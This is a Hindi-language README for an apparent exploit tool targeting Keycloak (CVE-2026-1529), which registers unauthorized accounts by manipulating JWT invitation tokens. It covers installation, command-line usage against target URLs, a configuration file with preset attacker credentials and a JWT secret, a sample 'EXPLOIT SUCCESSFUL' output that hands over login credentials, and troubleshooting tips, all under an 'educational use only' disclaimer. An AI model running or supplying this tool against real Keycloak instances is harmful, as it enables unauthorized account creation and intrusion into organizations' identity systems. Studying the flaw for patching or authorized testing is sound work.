
Keycloak: अनधिकृत संगठन पंजीकरण अनुचित निमंत्रण टोकन सत्यापन के माध्यम से
CVE-2026-1529: Keycloak - अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण
⚠️ चेतावनी: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
यह टूल Keycloak (CVE-2026-1529) में एक गंभीर भेद्यता प्रदर्शित करता है जो अनुचित JWT आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण की अनुमति देता है। यह एक्सप्लॉइट Keycloak इंस्टेंस तक अनधिकृत पहुंच प्राप्त करने के लिए आमंत्रण टोकन में हेरफेर करता है।
भेद्यता विवरण:
# रिपॉजिटरी क्लोन करें
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# वर्चुअल वातावरण बनाएं
python3 -m venv venv
source venv/bin/activate # Windows पर: venv\Scripts\activate
# निर्भरताएं स्थापित करें
pip install -r requirements.txt
# निर्देशिका संरचना बनाएं
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit
# रिलीज़ से फ़ाइलें डाउनलोड करें या मैन्युअल रूप से कॉपी करें
# फिर निर्भरताएं स्थापित करें
pip install requests urllib3 PyJWT
keycloak-exploit/
├── keycloak-exploit.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt # Python निर्भरताएं
├── README.md # यह फ़ाइल
├── config/
│ └── default_config.json # कॉन्फ़िगरेशन फ़ाइल
├── utils/
│ ├── __init__.py # पैकेज इनिशियलाइज़र
│ ├── http_utils.py # HTTP क्लाइंट उपयोगिताएं
│ ├── jwt_utils.py # JWT हेरफेर
│ └── crypto_utils.py # क्रिप्टो उपयोगिताएं
├── logs/ # स्वतः-जनित लॉग
└── output/
└── reports/ # एक्सप्लॉइट रिपोर्ट
python3 keycloak-exploit.py https://target-keycloak.com
# कस्टम आमंत्रण टोकन के साथ
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com
# कस्टम संगठन ID के साथ
python3 keycloak-exploit.py -o custom_org_id https://target.com
# कस्टम कॉन्फ़िगरेशन फ़ाइल के साथ
python3 keycloak-exploit.py -c /path/to/config.json https://target.com
# डीबग लॉगिंग सक्षम करें
python3 keycloak-exploit.py -d https://target.com
# सहायता दिखाएं
python3 keycloak-exploit.py -h
# संस्करण दिखाएं
python3 keycloak-exploit.py -v
एक्सप्लॉइट पैरामीटर अनुकूलित करने के लिए config/default_config.json संपादित करें:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
एक्सप्लॉइट निम्नलिखित चरणों में काम करता है:
भेद्यता जांच
टोकन जनरेशन/हेरफेर
उपयोगकर्ता पंजीकरण
लॉगिन सत्यापन
रिपोर्ट जनरेशन
output/reports/ में सहेजता है┌─────────────────┐
│ Target Check │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Gen/Get │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Manipulate│
└────────┬────────┘
│
▼
┌─────────────────┐
│ User Register │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Login Test │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Report Gen │
└─────────────────┘
============================================================
CVE-2026-1529 EXPLOIT RESULTS
============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260211_050507.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
============================================================
by f3ds cr3w est, 2002
============================================================
एक विस्तृत रिपोर्ट output/reports/ में सहेजी जाती है जिसमें शामिल हैं:
लॉग विस्तृत निष्पादन जानकारी के साथ logs/ निर्देशिका में सहेजे जाते हैं।
समाधान:
# सुनिश्चित करें कि आप सही निर्देशिका में हैं
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com
समाधान:
# सुनिश्चित करें कि config निर्देशिका मौजूद है
mkdir -p config
# config/ में default_config.json कॉपी या बनाएं
समाधान: यह नवीनतम संस्करण में ठीक कर दिया गया है। urllib3 अपडेट करें:
pip install --upgrade urllib3
संभावित कारण:
समाधान:
# अधिक विवरण देखने के लिए डीबग लॉगिंग सक्षम करें
python3 keycloak-exploit.py -d https://target.com
समाधान:
# config/default_config.json में टाइमआउट बढ़ाएं
"timeout": 60
समस्याओं के निवारण के लिए वर्बोज़ लॉगिंग सक्षम करें:
python3 keycloak-exploit.py -d https://target.com
यह दिखाएगा:
⚠️ महत्वपूर्ण कानूनी सूचना ⚠️
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस टूल का उपयोग करके, आप सहमत हैं कि:
1. आप इस टूल का उपयोग केवल उन सिस्टम पर करेंगे जिनके आप मालिक हैं या जिनके परीक्षण के लिए
आपके पास स्पष्ट लिखित अनुमति है।
2. आप समझते हैं कि कंप्यूटर सिस्टम तक अनधिकृत पहुंच कानूनों के तहत अवैध है, जिनमें शामिल हैं लेकिन इन्हीं तक सीमित नहीं:
- Computer Fraud and Abuse Act (CFAA) - संयुक्त राज्य अमेरिका
- Computer Misuse Act - यूनाइटेड किंगडम
- अन्य देशों में समान कानून
3. आप इस टूल के उपयोग के किसी भी परिणाम की पूरी जिम्मेदारी स्वीकार करते हैं।
4. लेखक और योगदानकर्ता इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
5. यह टूल बिना किसी वारंटी के "जैसा है" (AS IS) प्रदान किया गया है।
अपने जोखिम पर उपयोग करें। अनधिकृत पहुंच एक अपराध है।
योगदान का स्वागत है! कृपया इन दिशानिर्देशों का पालन करें:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)# अपना फोर्क क्लोन करें
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# वर्चुअल वातावरण बनाएं
python3 -m venv venv
source venv/bin/activate
# निर्भरताएं स्थापित करें
pip install -r requirements.txt
# अपने परिवर्तन करें और परीक्षण करें
python3 keycloak-exploit.py https://test-target.com
द्वारा निर्मित: f3ds cr3w est, 2002
प्रश्नों, समस्याओं या सुरक्षा चिंताओं के लिए:
याद रखें: हमेशा जिम्मेदार प्रकटीकरण और नैतिक हैकिंग का अभ्यास करें। Ref: https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation f3ds cr3w est, 2002 द्वारा ❤️ के साथ बनाया गया
| तर्क | शॉर्ट | विवरण |
|---|
target | - | लक्ष्य Keycloak URL (आवश्यक) |
--token | -t | कस्टम आमंत्रण टोकन |
--org-id | -o | कस्टम संगठन ID |
--config | -c | कॉन्फ़िगरेशन फ़ाइल का पथ |
--debug | -d | डीबग लॉगिंग सक्षम करें |
--version | -v | संस्करण जानकारी दिखाएं |
--help | -h | सहायता संदेश दिखाएं |
| अनुभाग | पैरामीटर | विवरण | डिफ़ॉल्ट |
|---|
exploit | default_username | पंजीकरण के लिए उपयोगकर्ता नाम | admin_user_2026 |
exploit | default_password | पंजीकरण के लिए पासवर्ड | KeycloakCVE2026! |
exploit | default_email | पंजीकरण के लिए ईमेल | [email protected] |
exploit | timeout | HTTP अनुरोध टाइमआउट (सेकंड) | 30 |
exploit | max_retries | अधिकतम HTTP रीट्राई | 3 |
jwt | algorithm | JWT हस्ताक्षर एल्गोरिदम | HS256 |
jwt | secret_key | JWT गुप्त कुंजी | कस्टम |
jwt | token_expiry | टोकन समाप्ति (सेकंड) | 3600 |